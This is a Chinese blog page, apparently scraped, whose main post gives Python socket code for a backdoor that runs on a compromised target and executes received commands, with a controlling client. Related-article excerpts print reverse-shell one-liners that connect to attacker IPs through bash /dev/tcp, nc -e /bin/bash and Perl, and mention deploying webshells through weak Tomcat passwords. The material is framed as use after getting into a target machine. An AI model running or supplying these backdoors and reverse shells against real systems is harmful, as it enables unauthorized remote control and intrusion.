python模拟菜刀反弹shell绕过限制【推荐】
有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell
主要用到python os库和sokect库
这里的服务端在目标机上运行
from socket import * from os import * s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议 s.bind(('',6666))#补丁端口 s.listen(1)#开始监听一个队列 while True: sock,addr=s.accept()#返回两次 第一次返回连接地址 二 端口号 print ('客户端:',addr) while True: cmd=sock.recv(1024)#缓存长度 接收传递过来 cmdstr=cmd.decode() if cmdstr=='exit': print ('客户端:',addr,'关闭') sock.close() break result=popen(cmdstr).read() sock.send(result.encode()) s.close()
本机运行
from socket import * from os import * c=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议 c.connect(('127.0.0.1',6666))#连接地址 while True: cmd=input("cmd:") c.send(cmd.encode())#必须传递流 if cmd=='exit': c.close() break data=c.recv(1014) print (data.decode())
总结
以上所述是小编给大家介绍的python模拟菜刀反弹shell绕过限制,希望对大家有所帮助,如果大家有任何疑问欢迎给我留言,小编会及时回复大家的!
相关推荐
-
python 执行shell命令并将结果保存的实例
方法1: 将shell执行的结果保存到字符串 def run_cmd(cmd): result_str='' process = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) result_f = process.stdout error_f = process.stderr errors = error_f.read() if errors: pass result_str =
-
Python 运行 shell 获取输出结果的实例
首先使用内置模块os. >>> import os >>> code = os.system("pwd && sleep 2") # /User/zhipeng >>> print code # 0 问题是 os.system 只能获取到结束状态 使用内置模块 subprocess >>> import subprocess >>> subprocess.Popen("p
-
在python 中实现运行多条shell命令
使用py时可能需要连续运行多条shell 命令 1. # coding: UTF-8 import sys reload(sys) sys.setdefaultencoding('utf8') import subprocess import os import commands #os.system('cmd1 && cmd2') cmd1 = "cd ../" cmd2 = "ls" cmd = cmd1 + " &&
-
shell命令行,一键创建 python 模板文件脚本方法
写 python 文件时,每个文件开头都必须注明版本和编码.每次我 touch 文件之后粘贴这两句话让我不胜其烦. 由于我没有安装 python 的 IDE 工具,也没有为 vim 安装相应的插件.主要是为了练习自己的编码能力,而不希望过于依赖工具,所以为了解决这个问题,我写了这个脚本. #!/bin/bash if [ -n "$1" ]; then if [ -f "$1" ]; then echo $1 '文件已经存在,不能重复创建' else echo '#
-
Python下调用Linux的Shell命令的方法
有时候难免需要直接调用Shell命令来完成一些比较简单的操作,比如mount一个文件系统之类的.那么我们使用Python如何调用Linux的Shell命令?下面来介绍几种常用的方法: 1. os 模块 1.1. os模块的exec方法族 Python的exec系统方法同Unix的exec系统调用是一致的.这些方法适用于在子进程中调用外部程序的情况,因为外部程序会替换当前进程的代码,不会返回.( 这个看了点 help(os) --> search "exec" 的相关介绍,但是没
-
python模拟菜刀反弹shell绕过限制【推荐】
有的时候我们在获取到目标电脑时候如果对方电脑又python 编译环境时可以利用python 反弹shell 主要用到python os库和sokect库 这里的服务端在目标机上运行 from socket import * from os import * s=socket(AF_INET,SOCK_STREAM)#IVP4 寻址 tcp协议 s.bind(('',6666))#补丁端口 s.listen(1)#开始监听一个队列 while True: sock,addr=s.accept()#
-
Linux下NC反弹shell命令(推荐)
本机开启监听: nc -lvnp 4444 nc -vvlp 4444 目标机器开启反弹 bash版本: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p
-
Python模拟登入的N种方式(建议收藏)
这段时间在研究如何破解官网验证码,然后进行下一步的爬虫操作,然而一个多星期过去了,编写的代码去识别验证码的效率还是很低,尝试用了tesserorc库和百度的API接口,都无济于事,本以为追不上五月的小尾巴,突然想到我尝试了这么多方法何不为一篇破坑博客呢. 现在很多官网都会给出相应的反扒措施,就拿这个登入来说,如果你不登入账号那么你就只能获取微量的信息,甚至获取不了信息,这对我们爬虫来说是非常不友好的,但是我们总不可能每次都需要手动登入吧,一次二次你能接受,大工程呢?既然学了python,而不为用
-
Tomcat弱口令复现及利用(反弹shell)
目录 漏洞描述 复现 环境 攻击流程 利用 msf利用 反弹shell利用 参考文章 漏洞描述 Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf\tomcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令.Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下.其中,欲访问后台,需要对应用户有相应权限.Tomcat7+ 权限分为:manager(后台管理) manager-gui 拥有html页面权限man
-
Python安装Numpy和matplotlib的方法(推荐)
Python安装Numpy和matplotlib的方法(推荐) 注意: 下载的库名中cp27代表python2.7,其它同理. 在shell中输入import pip; print(pip.pep425tags.get_supported())可以获取到pip支持的文件名还有版本 ================安装Numpy==================== 下载地址: https://pypi.python.org/pypi/numpy 类似 numpy-1.13.3-cp36-no
-
linux反弹shell的原理详解
完整命令 反弹shell命令: bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 bash -i > /dev/tcp/ip/port 0>&1 2>&1 利用nc反弹shell: nc -lvvp 12345 -t -e /bin/bash 原理 bash -i > /dev/tcp/ip/port 0>&1 2>&1 bash -i 打开一个交互式的bash &是为了区分
-
详解NC反弹shell的几种方法
假如ubuntu.CentOS为目标服务器系统 kali为攻击者的系统,ip为:192.168.0.4,开放7777端口且没被占用 最终是将ubuntu.CentOS的shell反弹到kali上 正向反弹shell ubuntu或者CentOS上面输入 nc -lvp 7777 -e /bin/bash kali上输入 nc ip 7777 正向反弹是目标机先执行nc命令,然后kali上再进行nc监听,即可反弹shell. 需要目标机安装nc. 反向反弹shell 方法1:bash反弹 bash
-
反弹shell的几种姿势小结
目录 Linux 反弹shell Windows反弹shell 在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入. 反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步.所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明. Linux 反弹shell 姿势一:bash反弹 bash -i >& /dev/tcp/192.168.99.242
-
Python 模拟员工信息数据库操作的实例
1.功能简介 此程序模拟员工信息数据库操作,按照语法输入指令即能实现员工信息的增.删.改.查功能. 2.实现方法 • 架构: 本程序采用python语言编写,关键在于指令的解析和执行:其中指令解析主要运用了正则表达式来高效匹配有效信息:指令执行通过一个commd_exe主执行函数和增.删.改.查4个子执行函数来实现,操作方法主要是运用面向对象方法将员工信息对象化,从而使各项操作都能方便高效实现.程序主要函数如下: (1)command_exe(command) 指令执行主函数,根据指令第一个字段
-
Python 模拟购物车的实例讲解
1.功能简介 此程序模拟用户登陆商城后购买商品操作.可实现用户登陆.商品购买.历史消费记查询.余额和消费信息更新等功能.首次登陆输入初始账户资金,后续登陆则从文件获取上次消费后的余额,每次购买商品后会扣除相应金额并更新余额信息,退出时也会将余额和消费记录更新到文件以备后续查询. 2.实现方法 架构: 本程序采用python语言编写,将各项任务进行分解并定义对应的函数来处理,从而使程序结构清晰明了.主要编写了六个函数: (1)login(name,password) 用户登陆函数,实现用户名和密码
随机推荐
- 5个并发处理技巧代码示例
- 基于JavaScript表单脚本(详解)
- js中变量的连续赋值(实例讲解)
- 各种一句话木马大全
- 在DOS方式下对注册表进行操作的代码
- Java Socket聊天室编程(二)之利用socket实现单聊聊天室
- Java与Oracle实现事务(JDBC事务)实例详解
- 微信企业号 根据错误码返回错误信息类封装
- ajax内部值外部调用不了的原因及解决方法
- 巧用weui.topTips验证数据的实例
- bootstrap css样式之表单
- php实现mysql封装类示例
- PHPLog php 程序调试追踪工具
- MySQL函数大全及用法示例分享
- 详解Node.js串行化流程控制
- 详解Web使用webpack构建前端项目
- FCKeditor提供了一个完整的JavaScript API
- 记一次公司仓库数据库服务器死锁过程及解决办法
- 基于jQuery的弹出警告对话框美化插件(警告,确认和提示)
- jquery.qrcode在线生成二维码使用示例